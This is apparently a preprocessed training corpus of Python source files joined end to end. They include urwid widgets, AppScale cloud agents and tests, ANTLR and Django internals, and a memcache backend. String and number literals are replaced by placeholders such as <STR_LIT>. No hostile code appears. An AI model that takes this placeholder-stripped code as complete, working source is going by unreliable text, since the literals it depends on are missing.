<EOL> else : <EOL> return target , target . get_node ( ) <EOL> class TreeListBox ( urwid . ListBox ) : <EOL> """<STR_LIT>""" <EOL> def keypress ( self , size , key ) : <EOL> key = self . __super . keypress ( size , key ) <EOL> return self . unhandled_input ( size , key ) <EOL> def unhandled_input ( self , size , input ) : <EOL> """<STR_LIT>""" <EOL> if input == '<STR_LIT:left>' : <EOL> self . move_focus_to_parent ( size ) <EOL> elif input == '<STR_LIT:->' : <EOL> self . collapse_focus_parent ( size ) <EOL> elif input == '<STR_LIT>' : <EOL> self . focus_home ( size ) <EOL> elif input == '<STR_LIT:end>' : <EOL> self . focus_end ( size ) <EOL> else : <EOL> return input <EOL> def collapse_focus_parent ( self , size ) : <EOL> """<STR_LIT>""" <EOL> widget , pos = self . body . get_focus ( ) <EOL> self . move_focus_to_parent ( size ) <EOL> pwidget , ppos = self . body . get_focus ( ) <EOL> if pos != ppos : <EOL> self . keypress ( size , "<STR_LIT:->" ) <EOL> def move_focus_to_parent ( self , size ) : <EOL> """<STR_LIT>""" <EOL> widget , pos = self . body . get_focus ( ) <EOL> parentpos = pos . get_parent ( ) <EOL> if parentpos is None : <EOL> return <EOL> middle , top , bottom = self . calculate_visible ( size ) <EOL> row_offset , focus_widget , focus_pos , focus_rows , cursor = middle <EOL> trim_top , fill_above = top <EOL> for widget , pos , rows in fill_above : <EOL> row_offset -= rows <EOL> if pos == parentpos : <EOL> self . change_focus ( size , pos , row_offset ) <EOL> return <EOL> self . change_focus ( size , pos . get_parent ( ) ) <EOL> def focus_home ( self , size ) : <EOL> """<STR_LIT>""" <EOL> widget , pos = self . body . get_focus ( ) <EOL> rootnode = pos . get_root ( ) <EOL> self . change_focus ( size , rootnode ) <EOL> def focus_end ( self , size ) : <EOL> """<STR_LIT>""" <EOL> maxrow , maxcol = size <EOL> widget , pos = self . body . get_focus ( ) <EOL> rootnode = pos . get_root ( ) <EOL> rootwidget = rootnode . get_widget ( ) <EOL> lastwidget = rootwidget . last_child ( ) <EOL> lastnode = lastwidget . get_node ( ) <EOL> self . change_focus ( size , lastnode , maxrow - <NUM_LIT:1> ) </s>
<s> from appenlight_client . utils import import_module , deco_func_or_method <EOL> from appenlight_client . timing import time_trace <EOL> ignore_set = frozenset ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def add_timing ( min_duration = <NUM_LIT:3> ) : <EOL> module = import_module ( '<STR_LIT>' ) <EOL> if not module : <EOL> return <EOL> def gather_args_host ( c ) : <EOL> return { '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : c . host , <EOL> '<STR_LIT:count>' : True , <EOL> '<STR_LIT>' : ignore_set } <EOL> def gather_args_sslhost ( c ) : <EOL> return { '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : c . host , <EOL> '<STR_LIT:count>' : True , <EOL> '<STR_LIT>' : ignore_set } <EOL> deco_func_or_method ( module , '<STR_LIT>' , time_trace , <EOL> gatherer = gather_args_host , min_duration = min_duration ) <EOL> deco_func_or_method ( module , '<STR_LIT>' , time_trace , <EOL> gatherer = gather_args_sslhost , min_duration = min_duration ) </s>
<s> """<STR_LIT>""" <EOL> from ec2_agent import EC2Agent <EOL> import boto <EOL> import time <EOL> from urlparse import urlparse <EOL> __author__ = '<STR_LIT>' <EOL> __email__ = '<STR_LIT>' <EOL> class OpenStackAgent ( EC2Agent ) : <EOL> """<STR_LIT>""" <EOL> REQUIRED_OPENSTACK_CREDENTIALS = list ( EC2Agent . REQUIRED_EC2_CREDENTIALS ) + [ '<STR_LIT>' ] <EOL> REQUIRED_CREDENTIALS = REQUIRED_OPENSTACK_CREDENTIALS <EOL> DEFAULT_REGION = "<STR_LIT>" <EOL> def describe_instances ( self , parameters , pending = False ) : <EOL> """<STR_LIT>""" <EOL> instance_ids = [ ] <EOL> public_ips = [ ] <EOL> private_ips = [ ] <EOL> conn = self . open_connection ( parameters ) <EOL> reservations = conn . get_all_instances ( ) <EOL> instances = [ i for r in reservations for i in r . instances ] <EOL> for i in instances : <EOL> if ( i . state == '<STR_LIT>' or ( pending and i . state == '<STR_LIT>' ) ) and i . key_name . startswith ( parameters [ self . PARAM_KEYNAME ] ) : <EOL> instance_ids . append ( i . id ) <EOL> public_ips . append ( i . public_dns_name ) <EOL> private_ips . append ( i . private_dns_name ) <EOL> return public_ips , private_ips , instance_ids <EOL> def open_connection ( self , parameters ) : <EOL> """<STR_LIT>""" <EOL> credentials = parameters [ self . PARAM_CREDENTIALS ] <EOL> region_str = self . DEFAULT_REGION <EOL> access_key = str ( credentials [ '<STR_LIT>' ] ) <EOL> secret_key = str ( credentials [ '<STR_LIT>' ] ) <EOL> ec2_url = str ( credentials [ '<STR_LIT>' ] ) <EOL> result = urlparse ( ec2_url ) <EOL> if result . port is None or result . hostname is None or result . path is None : <EOL> self . handle_failure ( '<STR_LIT>' + '<STR_LIT>' . format ( result . geturl ( ) ) ) <EOL> return None <EOL> region = boto . ec2 . regioninfo . RegionInfo ( name = region_str , <EOL> endpoint = result . hostname ) <EOL> return boto . connect_ec2 ( aws_access_key_id = access_key , <EOL> aws_secret_access_key = secret_key , <EOL> is_secure = ( result . scheme == '<STR_LIT>' ) , <EOL> region = region , <EOL> port = result . port , <EOL> path = result . path , debug = <NUM_LIT:2> ) <EOL> def wait_for_status_change ( self , parameters , conn , state_requested , <EOL> max_wait_time = <NUM_LIT> , poll_interval = <NUM_LIT:10> ) : <EOL> """<STR_LIT>""" <EOL> time_start = time . time ( ) <EOL> instance_ids = parameters [ self . PARAM_INSTANCE_IDS ] <EOL> instances_in_state = { } <EOL> while True : <EOL> time . sleep ( poll_interval ) <EOL> reservations = conn . get_all_instances ( instance_ids ) <EOL> instances = [ i for r in reservations for i in r . instances ] <EOL> for i in instances : <EOL> if i . state == state_requested and i . key_name . startswith ( parameters [ self . PARAM_KEYNAME ] ) : <EOL> if i . id not in instances_in_state . keys ( ) : <EOL> instances_in_state [ i . id ] = <NUM_LIT:1> <EOL> if len ( instances_in_state . keys ( ) ) >= len ( instance_ids ) : <EOL> return True <EOL> if time . time ( ) - time_start > max_wait_time : <EOL> return False </s>
<s> import json <EOL> import os <EOL> import sys <EOL> import time <EOL> import unittest <EOL> from flexmock import flexmock <EOL> import SOAPpy <EOL> lib = os . path . dirname ( __file__ ) + os . sep + "<STR_LIT:..>" + os . sep + "<STR_LIT>" <EOL> sys . path . append ( lib ) <EOL> from appscale_logger import AppScaleLogger <EOL> from appscale_tools import AppScaleTools <EOL> from local_state import LocalState <EOL> from parse_args import ParseArgs <EOL> class TestAppScaleSetProperty ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . keyname = "<STR_LIT>" <EOL> self . function = "<STR_LIT>" <EOL> flexmock ( AppScaleLogger ) <EOL> AppScaleLogger . should_receive ( '<STR_LIT>' ) . and_return ( ) <EOL> AppScaleLogger . should_receive ( '<STR_LIT:success>' ) . and_return ( ) <EOL> AppScaleLogger . should_receive ( '<STR_LIT>' ) . and_return ( ) <EOL> flexmock ( time ) <EOL> time . should_receive ( '<STR_LIT>' ) . and_return ( ) <EOL> def test_get_property ( self ) : <EOL> builtins = flexmock ( sys . modules [ '<STR_LIT>' ] ) <EOL> builtins . should_call ( '<STR_LIT>' ) <EOL> secret_key_location = LocalState . get_secret_key_location ( self . keyname ) <EOL> fake_secret = flexmock ( name = "<STR_LIT>" ) <EOL> fake_secret . should_receive ( '<STR_LIT>' ) . and_return ( '<STR_LIT>' ) <EOL> builtins . should_receive ( '<STR_LIT>' ) . with_args ( secret_key_location , '<STR_LIT:r>' ) . and_return ( fake_secret ) <EOL> flexmock ( os . path ) <EOL> os . path . should_call ( '<STR_LIT>' ) <EOL> os . path . should_receive ( '<STR_LIT>' ) . with_args ( <EOL> LocalState . get_locations_json_location ( self . keyname ) ) . and_return ( True ) <EOL> fake_nodes_json = flexmock ( name = "<STR_LIT>" ) <EOL> fake_nodes_json . should_receive ( '<STR_LIT>' ) . and_return ( json . dumps ( [ { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> } ] ) ) <EOL> builtins . should_receive ( '<STR_LIT>' ) . with_args ( <EOL> LocalState . get_locations_json_location ( self . keyname ) , '<STR_LIT:r>' ) . and_return ( fake_nodes_json ) <EOL> property_name = "<STR_LIT:name>" <EOL> property_value = "<STR_LIT:value>" <EOL> fake_appcontroller = flexmock ( name = '<STR_LIT>' ) <EOL> fake_appcontroller . should_receive ( '<STR_LIT>' ) . with_args ( property_name , <EOL> property_value , '<STR_LIT>' ) . and_return ( '<STR_LIT:OK>' ) <EOL> flexmock ( SOAPpy ) <EOL> SOAPpy . should_receive ( '<STR_LIT>' ) . with_args ( '<STR_LIT>' ) . and_return ( fake_appcontroller ) <EOL> argv = [ <EOL> "<STR_LIT>" , self . keyname , <EOL> "<STR_LIT>" , property_name , <EOL> "<STR_LIT>" , property_value <EOL> ] <EOL> options = ParseArgs ( argv , self . function ) . args <EOL> result = AppScaleTools . set_property ( options ) <EOL> self . assertEqual ( None , result ) </s>
<s> """<STR_LIT>""" <EOL> import logging <EOL> import os <EOL> import sys <EOL> import cassandra_interface <EOL> sys . path . append ( os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT>" ) ) <EOL> import monit_interface <EOL> def run ( ) : <EOL> """<STR_LIT>""" <EOL> logging . warning ( "<STR_LIT>" ) <EOL> monit_interface . stop ( <EOL> cassandra_interface . CASSANDRA_MONIT_WATCH_NAME , is_group = False ) <EOL> logging . warning ( "<STR_LIT>" ) <EOL> return True <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> run ( ) </s>
<s> import os <EOL> import unittest <EOL> import subprocess <EOL> from migration import * <EOL> from dbconstants import * <EOL> TEST_TAR = '<STR_LIT>' <EOL> class SecretTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . removeSecret = False <EOL> try : <EOL> FILE = open ( SECRET_LOCATION , '<STR_LIT:r>' ) <EOL> self . secret = FILE . read ( ) <EOL> FILE . close ( ) <EOL> except : <EOL> self . removeSecret = True <EOL> FILE = open ( SECRET_LOCATION , '<STR_LIT:w>' ) <EOL> self . secret = '<STR_LIT:x>' <EOL> FILE . write ( self . secret ) <EOL> FILE . close ( ) <EOL> def runTest ( self ) : <EOL> assert secret_check ( self . secret ) <EOL> assert not secret_check ( self . secret + '<STR_LIT:x>' ) <EOL> assert not secret_check ( '<STR_LIT>' ) <EOL> def tearDown ( self ) : <EOL> if self . removeSecret : <EOL> os . remove ( SECRET_LOCATION ) <EOL> class MD5TestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> process = subprocess . Popen ( [ '<STR_LIT>' , TEST_TAR ] , <EOL> shell = False , <EOL> stdout = subprocess . PIPE ) <EOL> output = process . communicate ( ) [ <NUM_LIT:0> ] <EOL> self . md5sum = output . split ( ) [ <NUM_LIT:0> ] <EOL> def runTest ( self ) : <EOL> assert md5_check ( TEST_TAR , self . md5sum ) <EOL> assert not md5_check ( TEST_TAR , self . md5sum + "<STR_LIT:1>" ) <EOL> class TarTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> full_list = os . listdir ( '<STR_LIT>' ) <EOL> self . file_list = [ ] <EOL> self . tarname = '<STR_LIT>' <EOL> tar = tarfile . open ( self . tarname , '<STR_LIT>' ) <EOL> tar . add ( '<STR_LIT>' ) <EOL> self . file_list . append ( '<STR_LIT>' ) <EOL> tar . close ( ) <EOL> def runTest ( self ) : <EOL> self . assertEquals ( untar_file ( self . tarname ) , self . file_list ) <EOL> def tearDown ( self ) : <EOL> remove_tar ( '<STR_LIT>' ) <EOL> remove_tar ( '<STR_LIT>' + self . tarname ) <EOL> class TestDataCase ( unittest . TestCase ) : <EOL> def runTest ( self ) : <EOL> assert untar_file ( TEST_TAR ) != [ ] <EOL> class DataLoadCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . data_file = untar_file ( TEST_TAR ) [ <NUM_LIT:0> ] <EOL> self . data = get_file_buffer ( self . data_file ) <EOL> def runTest ( self ) : <EOL> dict_data = get_dictionary ( self . data ) <EOL> assert dict_data != [ ] <EOL> trans , nontrans = dict_transform ( dict_data ) <EOL> class TableTesting ( unittest . TestCase ) : <EOL> def runTest ( self ) : <EOL> assert is_non_trans_table ( "<STR_LIT>" ) <EOL> assert is_non_trans_table ( "<STR_LIT>" ) <EOL> assert is_non_trans_table ( "<STR_LIT>" ) <EOL> assert is_non_trans_table ( "<STR_LIT>" ) <EOL> assert not is_non_trans_table ( "<STR_LIT>" ) <EOL> self . assertEquals ( get_table ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> self . assertEquals ( get_table ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> self . assertEquals ( get_root_key_table_appid ( "<STR_LIT>" ) , [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> self . assertEquals ( get_table ( "<STR_LIT>" ) , "<STR_LIT>" ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) </s>
<s> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> from google . appengine . _internal . antlr3 . tree import CommonTreeAdaptor <EOL> import stringtemplate3 <EOL> class DOTTreeGenerator ( object ) : <EOL> """<STR_LIT>""" <EOL> _treeST = stringtemplate3 . StringTemplate ( <EOL> template = ( <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> ) <EOL> _nodeST = stringtemplate3 . StringTemplate ( <EOL> template = "<STR_LIT>" <EOL> ) <EOL> _edgeST = stringtemplate3 . StringTemplate ( <EOL> template = "<STR_LIT>" <EOL> ) <EOL> def __init__ ( self ) : <EOL> self . nodeToNumberMap = { } <EOL> self . nodeNumber = <NUM_LIT:0> <EOL> def toDOT ( self , tree , adaptor = None , treeST = _treeST , edgeST = _edgeST ) : <EOL> if adaptor is None : <EOL> adaptor = CommonTreeAdaptor ( ) <EOL> treeST = treeST . getInstanceOf ( ) <EOL> self . nodeNumber = <NUM_LIT:0> <EOL> self . toDOTDefineNodes ( tree , adaptor , treeST ) <EOL> self . nodeNumber = <NUM_LIT:0> <EOL> self . toDOTDefineEdges ( tree , adaptor , treeST , edgeST ) <EOL> return treeST <EOL> def toDOTDefineNodes ( self , tree , adaptor , treeST , knownNodes = None ) : <EOL> if knownNodes is None : <EOL> knownNodes = set ( ) <EOL> if tree is None : <EOL> return <EOL> n = adaptor . getChildCount ( tree ) <EOL> if n == <NUM_LIT:0> : <EOL> return <EOL> number = self . getNodeNumber ( tree ) <EOL> if number not in knownNodes : <EOL> parentNodeST = self . getNodeST ( adaptor , tree ) <EOL> treeST . setAttribute ( "<STR_LIT>" , parentNodeST ) <EOL> knownNodes . add ( number ) <EOL> for i in range ( n ) : <EOL> child = adaptor . getChild ( tree , i ) <EOL> number = self . getNodeNumber ( child ) <EOL> if number not in knownNodes : <EOL> nodeST = self . getNodeST ( adaptor , child ) <EOL> treeST . setAttribute ( "<STR_LIT>" , nodeST ) <EOL> knownNodes . add ( number ) <EOL> self . toDOTDefineNodes ( child , adaptor , treeST , knownNodes ) <EOL> def toDOTDefineEdges ( self , tree , adaptor , treeST , edgeST ) : <EOL> if tree is None : <EOL> return <EOL> n = adaptor . getChildCount ( tree ) <EOL> if n == <NUM_LIT:0> : <EOL> return <EOL> parentName = "<STR_LIT>" % self . getNodeNumber ( tree ) <EOL> parentText = adaptor . getText ( tree ) <EOL> for i in range ( n ) : <EOL> child = adaptor . getChild ( tree , i ) <EOL> childText = adaptor . getText ( child ) <EOL> childName = "<STR_LIT>" % self . getNodeNumber ( child ) <EOL> edgeST = edgeST . getInstanceOf ( ) <EOL> edgeST . setAttribute ( "<STR_LIT>" , parentName ) <EOL> edgeST . setAttribute ( "<STR_LIT>" , childName ) <EOL> edgeST . setAttribute ( "<STR_LIT>" , parentText ) <EOL> edgeST . setAttribute ( "<STR_LIT>" , childText ) <EOL> treeST . setAttribute ( "<STR_LIT>" , edgeST ) <EOL> self . toDOTDefineEdges ( child , adaptor , treeST , edgeST ) <EOL> def getNodeST ( self , adaptor , t ) : <EOL> text = adaptor . getText ( t ) <EOL> nodeST = self . _nodeST . getInstanceOf ( ) <EOL> uniqueName = "<STR_LIT>" % self . getNodeNumber ( t ) <EOL> nodeST . setAttribute ( "<STR_LIT:name>" , uniqueName ) <EOL> if text is not None : <EOL> text = text . replace ( '<STR_LIT:">' , r'<STR_LIT>' ) <EOL> nodeST . setAttribute ( "<STR_LIT:text>" , text ) <EOL> return nodeST <EOL> def getNodeNumber ( self , t ) : <EOL> try : <EOL> return self . nodeToNumberMap [ t ] <EOL> except KeyError : <EOL> self . nodeToNumberMap [ t ] = self . nodeNumber <EOL> self . nodeNumber += <NUM_LIT:1> <EOL> return self . nodeNumber - <NUM_LIT:1> <EOL> def toDOT ( tree , adaptor = None , treeST = DOTTreeGenerator . _treeST , edgeST = DOTTreeGenerator . _edgeST ) : <EOL> """<STR_LIT>""" <EOL> gen = DOTTreeGenerator ( ) <EOL> return gen . toDOT ( tree , adaptor , treeST , edgeST ) </s>
<s> "<STR_LIT>" <EOL> import time <EOL> from google . appengine . _internal . django . core . cache . backends . base import BaseCache , InvalidCacheBackendError <EOL> from google . appengine . _internal . django . utils . encoding import smart_unicode , smart_str <EOL> try : <EOL> import cmemcache as memcache <EOL> import warnings <EOL> warnings . warn ( <EOL> "<STR_LIT>" , <EOL> PendingDeprecationWarning <EOL> ) <EOL> except ImportError : <EOL> try : <EOL> import memcache <EOL> except : <EOL> raise InvalidCacheBackendError ( "<STR_LIT>" ) <EOL> class CacheClass ( BaseCache ) : <EOL> def __init__ ( self , server , params ) : <EOL> BaseCache . __init__ ( self , params ) <EOL> self . _cache = memcache . Client ( server . split ( '<STR_LIT:;>' ) ) <EOL> def _get_memcache_timeout ( self , timeout ) : <EOL> """<STR_LIT>""" <EOL> timeout = timeout or self . default_timeout <EOL> if timeout > <NUM_LIT> : <EOL> timeout += int ( time . time ( ) ) <EOL> return timeout <EOL> def add ( self , key , value , timeout = <NUM_LIT:0> ) : <EOL> if isinstance ( value , unicode ) : <EOL> value = value . encode ( '<STR_LIT:utf-8>' ) <EOL> return self . _cache . add ( smart_str ( key ) , value , self . _get_memcache_timeout ( timeout ) ) <EOL> def get ( self , key , default = None ) : <EOL> val = self . _cache . get ( smart_str ( key ) ) <EOL> if val is None : <EOL> return default <EOL> return val <EOL> def set ( self , key , value , timeout = <NUM_LIT:0> ) : <EOL> self . _cache . set ( smart_str ( key ) , value , self . _get_memcache_timeout ( timeout ) ) <EOL> def delete ( self , key ) : <EOL> self . _cache . delete ( smart_str ( key ) ) <EOL> def get_many ( self , keys ) : <EOL> return self . _cache . get_multi ( map ( smart_str , keys ) ) <EOL> def close ( self , ** kwargs ) : <EOL> self . _cache . disconnect_all ( ) <EOL> def incr ( self , key , delta = <NUM_LIT:1> ) : <EOL> try : <EOL> val = self . _cache . incr ( key , delta ) <EOL> except ValueError : <EOL> val = None <EOL> if val is None : <EOL> raise ValueError ( "<STR_LIT>" % key ) <EOL> return val <EOL> def decr ( self , key , delta = <NUM_LIT:1> ) : <EOL> try : <EOL> val = self . _cache . decr ( key , delta ) <EOL> except ValueError : <EOL> val = None <EOL> if val is None : <EOL> raise ValueError ( "<STR_LIT>" % key ) <EOL> return val <EOL> def set_many ( self , data , timeout = <NUM_LIT:0> ) : <EOL> safe_data = { } <EOL> for key , value in data . items ( ) : <EOL> if isinstance ( value , unicode ) : <EOL> value = value . encode ( '<STR_LIT:utf-8>' ) <EOL> safe_data [ smart_str ( key ) ] = value <EOL> self . _cache . set_multi ( safe_data , self . _get_memcache_timeout ( timeout ) ) <EOL> def delete_many ( self , keys ) : <EOL> self . _cache . delete_multi ( map ( smart_str , keys ) ) <EOL> def clear ( self ) : <EOL> self . _cache . flush_all ( ) </s>
<s> """<STR_LIT>""" <EOL> import socket <EOL> class CachedDnsName ( object ) : <EOL> def __str__ ( self ) : <EOL> return self . get_fqdn ( ) <EOL> def get_fqdn ( self ) : <EOL> if not hasattr ( self , '<STR_LIT>' ) : <EOL> self . _fqdn = socket . getfqdn ( ) <EOL> return self . _fqdn <EOL> DNS_NAME = CachedDnsName ( ) </s>
<s> import os <EOL> from google . appengine . _internal . django . core . management . base import copy_helper , CommandError , LabelCommand <EOL> from google . appengine . _internal . django . utils . importlib import import_module <EOL> class Command ( LabelCommand ) : <EOL> help = "<STR_LIT>" <EOL> args = "<STR_LIT>" <EOL> label = '<STR_LIT>' <EOL> requires_model_validation = False <EOL> can_import_settings = False <EOL> def handle_label ( self , app_name , directory = None , ** options ) : <EOL> if directory is None : <EOL> directory = os . getcwd ( ) <EOL> project_name = os . path . basename ( directory ) <EOL> if app_name == project_name : <EOL> raise CommandError ( "<STR_LIT>" <EOL> "<STR_LIT>" % app_name ) <EOL> try : <EOL> import_module ( app_name ) <EOL> except ImportError : <EOL> pass <EOL> else : <EOL> raise CommandError ( "<STR_LIT>" % app_name ) <EOL> copy_helper ( self . style , '<STR_LIT>' , app_name , directory , project_name ) <EOL> class ProjectCommand ( Command ) : <EOL> help = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> def __init__ ( self , project_directory ) : <EOL> super ( ProjectCommand , self ) . __init__ ( ) <EOL> self . project_directory = project_directory <EOL> def handle_label ( self , app_name , ** options ) : <EOL> super ( ProjectCommand , self ) . handle_label ( app_name , self . project_directory , ** options ) </s>
<s> from google . appengine . _internal . django . template import TemplateSyntaxError , TemplateDoesNotExist , Variable <EOL> from google . appengine . _internal . django . template import Library , Node , TextNode <EOL> from google . appengine . _internal . django . template . loader import get_template <EOL> from google . appengine . _internal . django . conf import settings <EOL> from google . appengine . _internal . django . utils . safestring import mark_safe <EOL> register = Library ( ) <EOL> BLOCK_CONTEXT_KEY = '<STR_LIT>' <EOL> class ExtendsError ( Exception ) : <EOL> pass <EOL> class BlockContext ( object ) : <EOL> def __init__ ( self ) : <EOL> self . blocks = { } <EOL> def add_blocks ( self , blocks ) : <EOL> for name , block in blocks . iteritems ( ) : <EOL> if name in self . blocks : <EOL> self . blocks [ name ] . insert ( <NUM_LIT:0> , block ) <EOL> else : <EOL> self . blocks [ name ] = [ block ] <EOL> def pop ( self , name ) : <EOL> try : <EOL> return self . blocks [ name ] . pop ( ) <EOL> except ( IndexError , KeyError ) : <EOL> return None <EOL> def push ( self , name , block ) : <EOL> self . blocks [ name ] . append ( block ) <EOL> def get_block ( self , name ) : <EOL> try : <EOL> return self . blocks [ name ] [ - <NUM_LIT:1> ] <EOL> except ( IndexError , KeyError ) : <EOL> return None <EOL> class BlockNode ( Node ) : <EOL> def __init__ ( self , name , nodelist , parent = None ) : <EOL> self . name , self . nodelist , self . parent = name , nodelist , parent <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . name , self . nodelist ) <EOL> def render ( self , context ) : <EOL> block_context = context . render_context . get ( BLOCK_CONTEXT_KEY ) <EOL> context . push ( ) <EOL> if block_context is None : <EOL> context [ '<STR_LIT>' ] = self <EOL> result = self . nodelist . render ( context ) <EOL> else : <EOL> push = block = block_context . pop ( self . name ) <EOL> if block is None : <EOL> block = self <EOL> block = BlockNode ( block . name , block . nodelist ) <EOL> block . context = context <EOL> context [ '<STR_LIT>' ] = block <EOL> result = block . nodelist . render ( context ) <EOL> if push is not None : <EOL> block_context . push ( self . name , push ) <EOL> context . pop ( ) <EOL> return result <EOL> def super ( self ) : <EOL> render_context = self . context . render_context <EOL> if ( BLOCK_CONTEXT_KEY in render_context and <EOL> render_context [ BLOCK_CONTEXT_KEY ] . get_block ( self . name ) is not None ) : <EOL> return mark_safe ( self . render ( self . context ) ) <EOL> return '<STR_LIT>' <EOL> class ExtendsNode ( Node ) : <EOL> must_be_first = True <EOL> def __init__ ( self , nodelist , parent_name , parent_name_expr , template_dirs = None ) : <EOL> self . nodelist = nodelist <EOL> self . parent_name , self . parent_name_expr = parent_name , parent_name_expr <EOL> self . template_dirs = template_dirs <EOL> self . blocks = dict ( [ ( n . name , n ) for n in nodelist . get_nodes_by_type ( BlockNode ) ] ) <EOL> def __repr__ ( self ) : <EOL> if self . parent_name_expr : <EOL> return "<STR_LIT>" % self . parent_name_expr . token <EOL> return '<STR_LIT>' % self . parent_name <EOL> def get_parent ( self , context ) : <EOL> if self . parent_name_expr : <EOL> self . parent_name = self . parent_name_expr . resolve ( context ) <EOL> parent = self . parent_name <EOL> if not parent : <EOL> error_msg = "<STR_LIT>" % parent <EOL> if self . parent_name_expr : <EOL> error_msg += "<STR_LIT>" % self . parent_name_expr . token <EOL> raise TemplateSyntaxError ( error_msg ) <EOL> if hasattr ( parent , '<STR_LIT>' ) : <EOL> return parent <EOL> return get_template ( parent ) <EOL> def render ( self , context ) : <EOL> compiled_parent = self . get_parent ( context ) <EOL> if BLOCK_CONTEXT_KEY not in context . render_context : <EOL> context . render_context [ BLOCK_CONTEXT_KEY ] = BlockContext ( ) <EOL> block_context = context . render_context [ BLOCK_CONTEXT_KEY ] <EOL> block_context . add_blocks ( self . blocks ) <EOL> for node in compiled_parent . nodelist : <EOL> if not isinstance ( node , TextNode ) : <EOL> if not isinstance ( node , ExtendsNode ) : <EOL> blocks = dict ( [ ( n . name , n ) for n in <EOL> compiled_parent . nodelist . get_nodes_by_type ( BlockNode ) ] ) <EOL> block_context . add_blocks ( blocks ) <EOL> break <EOL> return compiled_parent . _render ( context ) <EOL> class ConstantIncludeNode ( Node ) : <EOL> def __init__ ( self , template_path ) : <EOL> try : <EOL> t = get_template ( template_path ) <EOL> self . template = t <EOL> except : <EOL> if settings . TEMPLATE_DEBUG : <EOL> raise <EOL> self . template = None <EOL> def render ( self , context ) : <EOL> if self . template : <EOL> return self . template . render ( context ) <EOL> else : <EOL> return '<STR_LIT>' <EOL> class IncludeNode ( Node ) : <EOL> def __init__ ( self , template_name ) : <EOL> self . template_name = Variable ( template_name ) <EOL> def render ( self , context ) : <EOL> try : <EOL> template_name = self . template_name . resolve ( context ) <EOL> t = get_template ( template_name ) <EOL> return t . render ( context ) <EOL> except : <EOL> if settings . TEMPLATE_DEBUG : <EOL> raise <EOL> return '<STR_LIT>' <EOL> def do_block ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> bits = token . contents . split ( ) <EOL> if len ( bits ) != <NUM_LIT:2> : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % bits [ <NUM_LIT:0> ] ) <EOL> block_name = bits [ <NUM_LIT:1> ] <EOL> try : <EOL> if block_name in parser . __loaded_blocks : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % ( bits [ <NUM_LIT:0> ] , block_name ) ) <EOL> parser . __loaded_blocks . append ( block_name ) <EOL> except AttributeError : <EOL> parser . __loaded_blocks = [ block_name ] <EOL> nodelist = parser . parse ( ( '<STR_LIT>' , '<STR_LIT>' % block_name ) ) <EOL> parser . delete_first_token ( ) <EOL> return BlockNode ( block_name , nodelist ) <EOL> def do_extends ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> bits = token . split_contents ( ) <EOL> if len ( bits ) != <NUM_LIT:2> : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % bits [ <NUM_LIT:0> ] ) <EOL> parent_name , parent_name_expr = None , None <EOL> if bits [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] in ( '<STR_LIT:">' , "<STR_LIT:'>" ) and bits [ <NUM_LIT:1> ] [ - <NUM_LIT:1> ] == bits [ <NUM_LIT:1> ] [ <NUM_LIT:0> ] : <EOL> parent_name = bits [ <NUM_LIT:1> ] [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> else : <EOL> parent_name_expr = parser . compile_filter ( bits [ <NUM_LIT:1> ] ) <EOL> nodelist = parser . parse ( ) <EOL> if nodelist . get_nodes_by_type ( ExtendsNode ) : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % bits [ <NUM_LIT:0> ] ) <EOL> return ExtendsNode ( nodelist , parent_name , parent_name_expr ) <EOL> def do_include ( parser , token ) : <EOL> """<STR_LIT>""" <EOL> bits = token . split_contents ( ) <EOL> if len ( bits ) != <NUM_LIT:2> : <EOL> raise TemplateSyntaxError ( "<STR_LIT>" % bits [ <NUM_LIT:0> ] ) <EOL> path = bits [ <NUM_LIT:1> ] <EOL> if path [ <NUM_LIT:0> ] in ( '<STR_LIT:">' , "<STR_LIT:'>" ) and path [ - <NUM_LIT:1> ] == path [ <NUM_LIT:0> ] : <EOL> return ConstantIncludeNode ( path [ <NUM_LIT:1> : - <NUM_LIT:1> ] ) <EOL> return IncludeNode ( bits [ <NUM_LIT:1> ] ) <EOL> register . tag ( '<STR_LIT>' , do_block ) <EOL> register . tag ( '<STR_LIT>' , do_extends ) <EOL> register . tag ( '<STR_LIT>' , do_include ) </s>
